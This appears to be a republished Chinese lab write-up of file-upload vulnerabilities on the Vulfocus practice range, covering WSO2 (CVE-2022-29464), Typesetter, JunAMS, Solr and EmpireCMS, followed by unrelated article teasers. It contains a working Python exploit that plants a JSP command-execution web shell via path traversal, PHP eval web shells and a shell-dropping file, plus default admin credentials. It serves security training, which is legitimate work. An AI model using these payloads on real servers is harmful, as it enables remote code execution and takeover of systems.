Vulfocus靶場-文件上傳-3

WSO2 文件上傳 (CVE-2022-29464)

WSO2是一家成立于 2005 年的開源技術提供商。它提供了一個企業平臺,用于在本地和整個 Internet 上 集成應用程序編程接口(API)、應用程序和 Web 服務。 某些 WSO2 產品允許無限制的文件上傳和遠程代碼執行。攻擊者必須使用帶有 Content-Disposition 目錄遍歷序列的 /fileupload 端點來到達 Web 根目錄下的目錄,例如 ../../../../repository/deployment/server/webapps 目錄。這會影響 WSO2 API Manager 2.2.0 及更高版本到 4.0.0;WSO2 Identity Server 5.2.0 及以上至 5.11.0;WSO2 身份服務器分析 5.4.0、5.4.1、5.5.0 和 5.6.0;WSO2 身份服務器作為密鑰管理器 5.3.0 及更高版本至 5.10.0;和 WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0。

打開頁面

使用exp進行測試上傳shell文件

漏洞利用過程

利用這個漏洞的過程涉及到構造特殊的 HTTP 請求,通過這些請求,攻擊者可以繞過正常的文件上傳限制,將 JSP 文件上傳到服務器的特定目錄中。上傳的 JSP 文件可以包含任意代碼,一旦上傳成功,攻擊者就可以通過訪問這個 JSP 文件來執行服務器上的命令。

以下是一個簡化的利用過程示例:

import?requests

# 目標 URL

url =?"http://target.com/fileupload/toolsAny"

# 構造惡意 JSP 文件內容

jsp_payload =?"""

<FORM>

<INPUT name='cmd' type=text>

<INPUT type=submit value='Run'>

</FORM>

<%@ page import="java.io.*" %>

<%

String cmd = request.getParameter("cmd");

String output = "";

if(cmd != null) {

String s = null;

try {

Process p = Runtime.getRuntime().exec(cmd,null,null);

BufferedReader sI = new BufferedReader(new

InputStreamReader(p.getInputStream()));

while((s = sI.readLine()) != null) { output += s+"</br>"; }

} catch(IOException e) { e.printStackTrace(); }

}

%>

<pre><%=output %></pre>

"""

# 發送惡意文件上傳請求

files = {?"../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp": jsp_payload }

response = requests.post(url, files=files, verify=False)

# 輸出上傳后的 JSP 文件訪問路徑

print(f"Shell uploaded at: {url}/authenticationendpoint/shell.jsp")

在這個示例中,攻擊者構造了一個包含惡意代碼的 JSP 文件,并通過修改 HTTP 請求的?Content-Disposition?頭部,使得文件被上傳到服務器的?authenticationendpoint?目錄下。這個目錄通常用于存放認證相關的頁面,但由于漏洞的存在,攻擊者可以將其用作存放惡意文件的位置。

typesetter 文件上傳 (CVE-2020-25790)

CVE-2020-25790?是一個影響 Typesetter CMS 的文件上傳漏洞。該漏洞允許攻擊者通過上傳包含惡意 PHP 代碼的 ZIP 文件,從而在服務器上執行任意代碼。

漏洞復現步驟

1. 登錄 Typesetter CMS

首先,使用管理員賬號登錄 Typesetter CMS。默認賬號和密碼通常為?admin/admin

示例:

訪問首頁 -> 點擊?"logged in"?-> 輸入賬號密碼 admin/admin

2. 創建惡意 PHP 文件

創建一個包含惡意代碼的 PHP 文件,例如:

<?php @eval($_POST['cmd']); ?>

將該文件壓縮成 ZIP 包,例如?shell.zip

3. 上傳 ZIP 文件

在 Typesetter CMS 中,找到文件上傳功能,選擇并上傳?shell.zip

示例:

選擇?"內容"?->?"已上傳的文檔"?->?"上傳"

4. 解壓 ZIP 文件

上傳完成后,選擇解壓該 ZIP 文件。解壓后會得到一個 PHP 文件,例如?shell.php

?junams 文件上傳 (CNVD-2020-24741)

JunAMS是一款以ThinkPHP為框架的開源內容管理系統。 JunAMS內容管理系統存在文件上傳漏洞,攻擊者可利用該漏洞上傳webshell,獲取服務器權限。 后臺路徑 /admin.php admin:admin

打開頁面

后臺登錄

測試的時候一直發現請求上傳接口出現異常 無法上傳文件 利用exp進行上傳

<form enctype="multipart/form-data" action="http://localhost//admin.php/common/add_images.html" method="post">  
<input type="file" name="file" size="50"><br>  
<input type="submit" value="Upload">  
</form>

solr 上傳代碼 (CVE-2019-12409)

Apache Solr CVE-2019-12409 是一個遠程代碼執行漏洞,涉及到 Java Management Extensions (JMX) 技術。JMX 通常用于管理和監控應用程序,但如果 JMX 服務端口暴露,遠程攻擊者可以利用這一點遠程加載惡意的 Bean 文件,從而執行遠程代碼。

漏洞條件

此漏洞影響 Apache Solr 的 8.1.1 和 8.2.0 版本。在?solr.in.sh?配置文件中,默認啟用了?ENABLE_REMOTE_JMX_OPTS?配置項,允許遠程加載 JMX。漏洞觸發還需要 RMI 端口開啟,默認為 18983,并且運行在 Linux 服務器系統上。

漏洞復現步驟

  1. 環境搭建:下載受影響的 Apache Solr 版本,如 8.2.0 或 8.1.1,從官方網站獲取。

  2. 配置檢查:在?solr.in.sh?文件中確認?ENABLE_REMOTE_JMX_OPTS?設置為 "true",表明存在漏洞。

  3. 啟動服務:在?bin?目錄下使用?./solr -e dih -force?命令啟動 Solr 服務。

  4. 端口檢查:使用?nmap?確認 JMX 服務的 18983 端口已開啟。

  5. 利用工具:可以使用?mjet?和?msf?工具進行漏洞利用。mjet?可以部署惡意的 MBean,而?msf?的?exploit/multi/misc/java_jmx_server?模塊可用于遠程代碼執行

我這里是本地搭建的老版本的vulfocus 復現不起來。?

官方的在線靶場也不能復現

empirecms 文件上傳 (CVE-2018-18086)

CVE-2018-18086?是一個影響 EmpireCMS(帝國網站管理系統)7.5 及之前版本的嚴重安全漏洞。該漏洞存在于?e/class/moddofun.php?文件中的?LoadInMod?函數中,攻擊者可以利用該漏洞上傳任意文件,從而實現任意代碼執行。

漏洞影響范圍

該漏洞影響 EmpireCMS 7.5 及之前的所有版本。攻擊者可以通過未驗證的數據庫表名修改,實現任意代碼執行。

漏洞復現步驟

  • 訪問后臺管理頁面:訪問?http://<目標IP>/empirecms/e/admin/index.php,使用默認賬號密碼?admin/123456?登錄后臺管理頁面。

  • 導入系統模型:依次點擊“系統” -> “管理數據表” -> “導入系統模型”。

  • 上傳惡意文件:創建一個名為?shell.php.mod?的文件,內容如下:

<?php file_put_contents("shell.php",?"<?php @eval(\$_POST['cmd']); ?>"); ?>

  • 驗證文件上傳:導入文件后,訪問?http://<目標IP>/empirecms/e/admin/shell.php,驗證文件是否成功上傳

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/81183.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/81183.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/81183.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

基于MCP的橋梁設計規范智能解析與校審系統構建實踐

引言 今天本文準備盤一個大活&#xff0c;聊一聊偏特定行業一點的AI技術深入應用思考及實踐。 一、傳統設計行業項目背景與行業痛點 在橋梁設計領域&#xff0c;標準規范是設計的基礎&#xff0c;直接關系到橋梁結構的安全性、耐久性和經濟性。然而&#xff0c;傳統的規范應…

遠程連接電腦的方法?異地遠程桌面連接和三方軟件實現

遠程連接電腦&#xff0c;是指通過網絡技術&#xff0c;在一臺設備上操控另一臺設備的電腦桌面&#xff0c;實現跨地域的操作和管理。在日常工作、技術支持、遠程辦公等場景中&#xff0c;遠程連接電腦都發揮著重要作用。實現遠程連接電腦主要有系統自帶工具和第三方軟件兩種方…

win11 安裝 wsl ubuntu 18.04后換源失敗!

記錄幾個問題是如何解決的。 一 下載wsl后&#xff0c;有報錯&#xff1a; Installing, this may take a few minutes... WslRegisterDistribution failed with error: 0x8007019e Error: 0x8007019e ??????? Linux ? Windows ???? Press any key to continue... …

PY32系列單片機離線燒錄器,可配置選項字節和上機臺批量燒錄

PY32離線燒錄器采用 MINI-USB 接口&#xff0c;提供穩定的物理連接。設備與電腦采用串口方式通訊&#xff0c;波特率固定為 1M。需配合我們的上位機使用。PY32離線燒錄器現支持芯片型號在PY32F002A/002B/002/003/030/071/072/040/403/303各封裝和XL32F001/003。燒錄器僅提供 3.…

深入理解 this 指向與作用域解析

引言 JavaScript 中的 this 關鍵字的靈活性既是強大特性也是常見困惑源。理解 this 的行為對于編寫可維護的代碼至關重要&#xff0c;但其動態特性也會讓我們感到困惑。 與大多數編程語言不同&#xff0c;JavaScript 的 this 不指向函數本身&#xff0c;也不指向函數的詞法作…

# IntelliJ IDEA企業版開發入門:包、類與項目結構詳解

--- ## 一、項目結構與包的概念 ### 1. 標準項目目錄解析 在IntelliJ IDEA中&#xff0c;一個Java項目通常包含以下核心目錄&#xff1a; - **src**&#xff1a;源代碼根目錄。 - **main**&#xff1a;主代碼目錄&#xff0c;存放業務邏輯代碼。 - **java**&#xff1a;Java…

NGINX 開源與社區動態:從基石到浪潮,持續演進的生態力量

NGINX 之所以能夠成為全球應用最為廣泛的 Web 服務器和反向代理軟件之一,其成功的核心驅動力無疑是開源。開放的源代碼、活躍的社區參與以及透明的開發過程,共同鑄就了 NGINX 的輝煌。然而,正如所有大型開源項目一樣,NGINX 的開源之路也并非一帆風順,其社區動態也時常涌現…

Electron(一)

前言&#xff1a; 參考尚硅谷視頻記錄&#xff1a;b站尚硅谷視頻-1小時上手electron 一、什么是electron? 是一款應用廣泛的、跨平臺的、桌面應用開發框架。 應用廣泛&#xff1a;很多桌面應用都是這個框架寫的&#xff0c;例如騰訊qq、百度云跨平臺&#xff1a;跨window、…

AI Agent開發第64課-DIFY和企業現有系統結合實現高可配置的智能零售AI Agent(上)

開篇 我們之前花了將近10個篇章講Dify的一些基礎應用,包括在講Dify之前我們講到了幾十個AI Agent的開發例子,我不知道大家發覺了沒有,在AI Agent開發過程中我們經常會伴隨著這樣的一些問題: 需要經常改貓娘;需要經常改調用LLM的參數,甚至在一個流程中有3個節點,每個節點…

ssti刷刷刷

[NewStarCTF 公開賽賽道]BabySSTI_One 測試發現過濾關鍵字&#xff0c;但是特殊符號中括號、雙引號、點都能用 可以考慮拼接或者編碼&#xff0c;這里使用拼接 ?name{{()["__cla"~"ss__"]}}?name{{()["__cla"~"ss__"]["__ba&…

google-Chrome常用插件

google-Chrome常用插件 1. json格式化展示插件 github下載jsonview-for-chrome插件 通過離線安裝方式 拓展程序-》管理拓展程序-》打開開發者模式-》加載已解壓的拓展程序-》選擇拓展程序解壓的位置 2. 翻譯插件 插件下載地址&#xff1a;Immersive Translate - Bilingual …

基于redis實現分布式鎖方案實戰

分布式鎖的進階實現與優化方案 作為Java高級開發工程師&#xff0c;我將為您提供更完善的Redis分布式鎖實現方案&#xff0c;包含更多生產級考量。 1. 生產級Redis分布式鎖實現 1.1 完整實現類&#xff08;支持可重入、自動續約&#xff09; import redis.clients.jedis.Je…

XML簡要介紹

實際上現在的Java Web項目中更多的是基于springboot開發的&#xff0c;所以很少再使用xml去配置項目。所以我們的目的就是盡可能快速的去了解如何讀懂和使用xml文件&#xff0c;對于DTD&#xff0c;XMLSchema這類約束的學習可以放松&#xff0c;主要是確保自己知道這里面的大致…

UI自動化測試中,一個完整的斷言應所需要考慮的問題

在UI自動化測試中,一個完整的斷言應全面覆蓋用戶界面(UI)的功能性、交互性和視覺正確性。以下是斷言需要包含的核心內容及詳細說明: 一、基礎元素驗證 存在性斷言 驗證元素存在于DOM中示例代碼(Python + Selenium):assert driver.find_element(By.ID, "submit_btn&…

[Java][Leetcode middle] 238. 除自身以外數組的乘積

第一個想法是&#xff1a; 想求出所有元素乘積&#xff0c;然后除以i對應的元素本書&#xff1b;這個想法是完全錯誤的&#xff1a; nums[I] 可能有0題目要求了不能用除法 第二個想法是&#xff1a; 其實寫之前就知道會超時&#xff0c;但是我什么都做不到啊&#xff01; 雙…

5.16本日總結

一、英語 背誦list30&#xff0c;復習list1 二、數學 學習14講部分內容&#xff0c;訂正30講13講題目 三、408 學習計網5.3知識點&#xff0c;完成5.1&#xff0c;5.2題目并訂正 四、總結 高數對于基本定義概念類題目掌握不好&#xff0c;做題時往往不會下手&#xff0c…

深度學習---常用優化器

優化器一&#xff1a;Adam&#xff08;Adaptive Moment Estimation&#xff09; 一、適用場景總結&#xff08;實踐導向&#xff09; 場景是否推薦用 Adam說明小模型訓練&#xff08;如 MLP、CNN&#xff09;???穩定、無需復雜調參&#xff0c;適合快速實驗初學者使用或結構…

SparkSQL 連接 MySQL 并添加新數據:實戰指南

SparkSQL 連接 MySQL 并添加新數據&#xff1a;實戰指南 在大數據處理中&#xff0c;SparkSQL 作為 Apache Spark 的重要組件&#xff0c;能夠方便地與外部數據源進行交互。MySQL 作為廣泛使用的關系型數據庫&#xff0c;與 SparkSQL 的結合可以充分發揮兩者的優勢。本文將詳細…

基于對抗性后訓練的快速文本到音頻生成:stable-audio-open-small 模型論文速讀

Fast Text-to-Audio Generation with Adversarial Post-Training 論文解析 一、引言與背景 文本到音頻系統的局限性&#xff1a;當前文本到音頻生成系統性能雖佳&#xff0c;但推理速度慢&#xff08;需數秒至數分鐘&#xff09;&#xff0c;限制了其在創意領域的應用。 研究…

AI畫圖Stable Diffusion web UI學習筆記(中)

本文記錄講解AI畫圖工具Stable Diffusion web UI的部分基本使用方法&#xff0c;以便進行學習。AI畫圖Stable Diffusion web UI學習筆記分為上、中、下三篇文章。 我在 AI畫圖Stable Diffusion web UI學習筆記&#xff08;上&#xff09;_webui-CSDN博客 這篇文章中介紹了Stabl…